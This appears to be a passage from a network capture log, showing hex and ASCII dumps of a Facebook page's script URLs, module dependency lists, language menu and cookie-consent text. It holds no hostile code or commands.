2f 73 74 61 74 69 63 2e 78 78 2e 66 62
                                                                                                                Data Ascii: atic.xx.fbcdn.net\/rsrc.php\/v3\/yP\/r\/0f3OXvUFIYn.js?_nc_x=Ij3Wp8lg5Kz"},"SwTsWhd":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/l\/0,cross\/KvRIsiothsK.css?_nc_x=Ij3Wp8lg5Kz"},"EHy8xVL":{"type":"js","src":"https:\/\/static.xx.fb
                                                                                                                2022-10-13 11:08:15 UTC4901INData Raw: 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 45 5c 2f 72 5c 2f 77 35 57 37 6b 62 42 70 4b 65 2d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 51 46 36 45 73 30 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 52 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6f 65 5f 4a 4b 58 6e 58 79 4f 2d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 42 44 52 74 6b 2b 43 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69
                                                                                                                Data Ascii: :\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/r\/w5W7kbBpKe-.js?_nc_x=Ij3Wp8lg5Kz"},"iQF6Es0":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yR\/l\/0,cross\/oe_JKXnXyO-.css?_nc_x=Ij3Wp8lg5Kz"},"BDRtk+C":{"type":"js","src":"https:\/\/stati
                                                                                                                2022-10-13 11:08:15 UTC4903INData Raw: 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 49 6d 61 34 5c 2f 79 32 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 5a 56 30 65 47 52 4c 38 64 42 71 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 78 33 39 30 4f 72 69 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 7a 38 65 34 5c 2f 79 6e 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 36 45 55 6a 4d 41 4f 5f 37 66 55 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 67 57 4d 4a 67 54 65 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22
                                                                                                                Data Ascii: ":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iIma4\/y2\/l\/en_US\/ZV0eGRL8dBq.js?_nc_x=Ij3Wp8lg5Kz"},"x390Ori":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iz8e4\/yn\/l\/en_US\/6EUjMAO_7fU.js?_nc_x=Ij3Wp8lg5Kz"},"gWMJgTe":{"type":"js","
                                                                                                                2022-10-13 11:08:15 UTC4904INData Raw: 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4a 5c 2f 72 5c 2f 45 65 6a 41 67 6e 48 55 61 64 34 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 56 76 56 46 77 38 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6e 5c 2f 72 5c 2f 41 57 65 70 76 66 2d 76 64 5a 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6d 6f 34 59 48 48 73 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76
                                                                                                                Data Ascii: bcdn.net\/rsrc.php\/v3\/yJ\/r\/EejAgnHUad4.js?_nc_x=Ij3Wp8lg5Kz"},"VvVFw8n":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yn\/r\/AWepvf-vdZG.js?_nc_x=Ij3Wp8lg5Kz"},"mo4YHHs":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v
                                                                                                                2022-10-13 11:08:15 UTC4906INData Raw: 2c 22 5c 2f 6f 64 52 52 34 57 22 2c 22 50 79 63 43 55 45 4d 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 0d 0a
                                                                                                                Data Ascii: ,"\/odRR4W","PycCUEM"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"
                                                                                                                2022-10-13 11:08:15 UTC4906INData Raw: 31 65 37 33 0d 0a 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 2c 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 49 6e 70 75 74 22 3a 7b 22 72 22 3a 5b 22 5a 32 47 6a 56 75 39 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4c 69 76 65 22 3a 7b 22 72 22 3a 5b 22 32 5c 2f 6d 61 51 5c 2f 51 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 5c 2f 6f 64 52 52 34 57 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 6f 67 67 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 50 79 63 43 55 45 4d 22 2c 22 5c 2f 6f 64 52 52 34 57 22 2c 22 6c 57 4f 76 47 54 61 22 2c
                                                                                                                Data Ascii: 1e73,"BanzaiScuba_DEPRECATED"],"r":["BIylKC4","hKY0QKT"]},"be":1},"Input":{"r":["Z2GjVu9"],"be":1},"Live":{"r":["2\/maQ\/Q","8zbEZtu","e9ANzw\/","n6W4xMH","vGt2mxz","\/o5YvO2","\/odRR4W"],"be":1},"Toggler":{"r":["8zbEZtu","PycCUEM","\/odRR4W","lWOvGTa",
                                                                                                                2022-10-13 11:08:15 UTC4907INData Raw: 6c 57 4f 76 47 54 61 22 2c 22 69 4d 61 77 6d 56 4a 22 2c 22 53 49 5c 2f 37 33 4f 70 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 50 64 39 56 6a 78 6c 22 2c 22 35 49 32 6e 39 72 4c 22 2c 22 4c 70 78 52 35 71 55 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 38 6d 7a 67 59 75 35 22 2c 22 4e 38 58 63 63 63 48 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 63 69 48 4d 6e 67 78 22 2c 22 54 37 65 75 57 4c 4b 22 2c 22 74 5c 2f 44 51 64 39 2b 22 2c 22 63 59 55 33 63 33 32 22 2c 22 35 56 78 43 64 34 48 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 5c 2f 41 67 70 4f 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f
                                                                                                                Data Ascii: lWOvGTa","iMawmVJ","SI\/73Op","n6W4xMH","vGt2mxz","\/o5YvO2","Pd9Vjxl","5I2n9rL","LpxR5qU","hKY0QKT","BIylKC4","8mzgYu5","N8XcccH","IaR\/6uP","ciHMngx","T7euWLK","t\/DQd9+","cYU3c32","5VxCd4H","07JSiP0","dx\/AgpO"],"rds":{"m":["Animation","VisualCompletio
                                                                                                                2022-10-13 11:08:15 UTC4909INData Raw: 79 63 43 55 45 4d 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 43 71 52 43 4a 4b 6c 22 2c 22 78 33 39 30 4f 72 69 22 2c 22 6c 76 58 36 66 6b 68 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 38 6d 7a 67 59 75 35 22 2c 22 65 45 50 37 62 42 46 22 2c 22 5c 2f 6f 64 52 52 34 57 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 58 4a 35 4e 4f 31 30 22 2c
                                                                                                                Data Ascii: ycCUEM","h3ZzAmG","CqRCJKl","x390Ori","lvX6fkh","lWOvGTa","vGt2mxz","BIylKC4","8mzgYu5","eEP7bBF","\/odRR4W"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["hKY0QKT"]},"be":1},"AsyncDialog":{"r":["R5w1rCJ","X9nr65a","ZEC4RrQ","8zbEZtu","XJ5NO10",
                                                                                                                2022-10-13 11:08:15 UTC4910INData Raw: 34 52 72 51 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 79 6c 4c 50 6b 6a 41 22 2c 22 79 53 65 57 37 48 67 22 2c 22 4c 70 78 52 35 71 55 22 2c 22 30 37 4a 53 69 50 30 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 58 4a
                                                                                                                Data Ascii: 4RrQ","e9ANzw\/","ylLPkjA","ySeW7Hg","LpxR5qU","07JSiP0"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"],"r":["hKY0QKT"]},"be":1},"ExceptionDialog":{"r":["R5w1rCJ","X9nr65a","ZEC4RrQ","8zbEZtu","XJ
                                                                                                                2022-10-13 11:08:15 UTC4911INData Raw: 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 6f 64 79 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 4f 64 70 4f 33 57 46 22 2c 22 6b 5a 55 78 35 76 6d 22 2c 22 4a 4a 44 51 59 4c 64 22 2c 22 79 6c 4c 50 6b 6a 41 22 2c 22 59 74 55 33 43 35 75 22 2c 22 38 6d 7a 67 59 75 35 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 30 37 4a 53 69 50 30 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 78 55 5c 2f 74 6e 74 6a 22 2c 22 4f 64 70
                                                                                                                Data Ascii: ","IntlQtEventFalcoEvent"],"r":["BIylKC4"]},"be":1},"XUIDialogBody.react":{"r":["R5w1rCJ","8zbEZtu","OdpO3WF","kZUx5vm","JJDQYLd","ylLPkjA","YtU3C5u","8mzgYu5","IaR\/6uP","07JSiP0"],"be":1},"XUIDialogFooter.react":{"r":["R5w1rCJ","8zbEZtu","xU\/tntj","Odp
                                                                                                                2022-10-13 11:08:15 UTC4913INData Raw: 22 64 78 5c 2f 41 67 70 4f 22 2c 22 67 74 42 4b 72 41 62 22 2c 22 79 56 74 2b 54 79 69 22 2c 22 50 5c 2f 6d 72 35 56 45 22 2c 22 65 38 52 6b 4a 6f 79 22 2c 22 48 4c 57 74 71 66 72 22 5d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 54 69 6d 65 53 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 76 61 72 20 73 3d 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 3b 73 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 4c 69 6e 6b 73 68 69 6d 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 75 70 70 6f 72 74 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 74 72 75
                                                                                                                Data Ascii: "dx\/AgpO","gtBKrAb","yVt+Tyi","P\/mr5VE","e8RkJoy","HLWtqfr"]);});</script><script>requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){var s=(new ServerJS());s.handle({"define":[["LinkshimHandlerConfig",[],{"supports_meta_referrer":tru
                                                                                                                2022-10-13 11:08:15 UTC4914INData Raw: 30 5f 31 5f 6c 69 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 4c 47 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 36 5c 2f 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 79 54 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 78 2b 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 36 76 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 51 6c 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 39 75 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 70 4a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 53 72 22 2c 22 5f 5f
                                                                                                                Data Ascii: 0_1_li","__markup_3310c079_0_2_LG","__markup_3310c079_0_3_6\/","__markup_3310c079_0_4_yT","__markup_3310c079_0_5_x+","__markup_3310c079_0_6_6v","__markup_3310c079_0_7_Ql","__markup_3310c079_0_8_9u","__markup_3310c079_0_9_pJ","__markup_3310c079_0_a_Sr","__
                                                                                                                2022-10-13 11:08:15 UTC4916INData Raw: 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 36 5c 2f 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 4b 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 6e 5f 55 53 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 74 72 75 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33
                                                                                                                Data Ascii: r":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_3_6\/"},"label":"English (UK)","title":"","className":"headerItem"},{"class":"headerItem","value":"en_US","selected":true,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_33
                                                                                                                2022-10-13 11:08:15 UTC4917INData Raw: 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6e 62 5f 4e 4f 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 75 6f 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 6c 5f 50 4c 22 2c 22 73
                                                                                                                Data Ascii: headerItem"},{"class":"headerItem","value":"nb_NO","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_b_uo"},"label":"Norsk (bokm\u00e5l)","title":"","className":"headerItem"},{"class":"headerItem","value":"pl_PL","s
                                                                                                                2022-10-13 11:08:15 UTC4919INData Raw: 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 31 58 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 69 5c 75 31 65 62 66 6e 67 20 56 69 5c 75 31 65 63 37 74 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 72 5f 54 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 38 6e 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30
                                                                                                                Data Ascii: m":"__markup_3310c079_0_i_1X"},"label":"Ti\u1ebfng Vi\u1ec7t","title":"","className":"headerItem"},{"class":"headerItem","value":"tr_TR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_j_8n"},"label":"T\u00fcrk\u0
                                                                                                                2022-10-13 11:08:15 UTC4920INData Raw: 32 63 62 36 0d 0a 5f 49 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 39 78 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 61 72 5f 41 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a
                                                                                                                Data Ascii: 2cb6_IL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_n_9x"},"label":"\u05e2\u05d1\u05e8\u05d9\u05ea","title":"","className":"headerItem"},{"class":"headerItem","value":"ar_AR","selected":false,"ctor":{"__m":
                                                                                                                2022-10-13 11:08:15 UTC4921INData Raw: 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6a 61 5f 4a 50 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 36 44 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6b 6f 5f 4b 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65
                                                                                                                Data Ascii: em","value":"ja_JP","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_u_6D"},"label":"\u65e5\u672c\u8a9e","title":"","className":"headerItem"},{"class":"headerItem","value":"ko_KR","selected":false,"ctor":{"__m":"Me
                                                                                                                2022-10-13 11:08:15 UTC4923INData Raw: 2c 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 4e 2b 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 75 74 6f 46 6c 69 70 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 41 72 72 6f 77 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 6f 73 69 74 69 6f 6e 43 6c 61 73 73 4f 6e 43 6f 6e 74 65 78 74 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 47 78 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 4e 2b 22 7d 2c 5b 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 75 74 6f 46 6c 69 70 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 41 72 72 6f 77 22 7d 2c 7b 22 5f 5f
                                                                                                                Data Ascii: ,"__elem_ec77afbd_0_0_N+","ContextualLayerAutoFlip","ContextualDialogArrow","ContextualLayerPositionClassOnContext"],[{"__m":"__elem_1de146dc_0_0_Gx"},{"__m":"__elem_ec77afbd_0_0_N+"},[{"__m":"ContextualLayerAutoFlip"},{"__m":"ContextualDialogArrow"},{"__
                                                                                                                2022-10-13 11:08:15 UTC4924INData Raw: 61 73 73 3d 5c 22 5f 39 78 6f 32 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 33 67 45 6e 47 54 78 62 37 7a 65 20 73 78 5f 38 39 30 62 33 34 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 34 5c 22 3e 50 72 6f 76 69 64 65 20 61 20 73 61 66 65 72 20 65 78 70 65 72 69 65 6e 63 65 20 62 79 20 75 73 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 65 20 72 65 63 65 69 76 65 20 66 72 6f 6d 20 63 6f 6f 6b 69 65 73 20 6f 6e 20 61 6e 64 20 6f 66 66 20 46 61 63 65 62 6f 6f 6b 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 32 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69
                                                                                                                Data Ascii: ass=\"_9xo2\">\u003Ci class=\"img sp_3gEnGTxb7ze sx_890b34\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide a safer experience by using information we receive from cookies on and off Facebook\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo2\">\u003Ci class=\"i
                                                                                                                2022-10-13 11:08:15 UTC4926INData Raw: 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 2d 5c 22 3e 43 6f 6f 6b 69 65 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 69 5c 22 3e 57 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 70 6f 6c 69 63 69 65 73 5c 2f 63 6f 6f 6b 69 65 73 5c 2f 23 6f 74 68 65 72 5f 63 6f 6d 70 61 6e 69 65 73 5f 73 65 63 74 69 6f 6e 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 63 6c 61 73 73
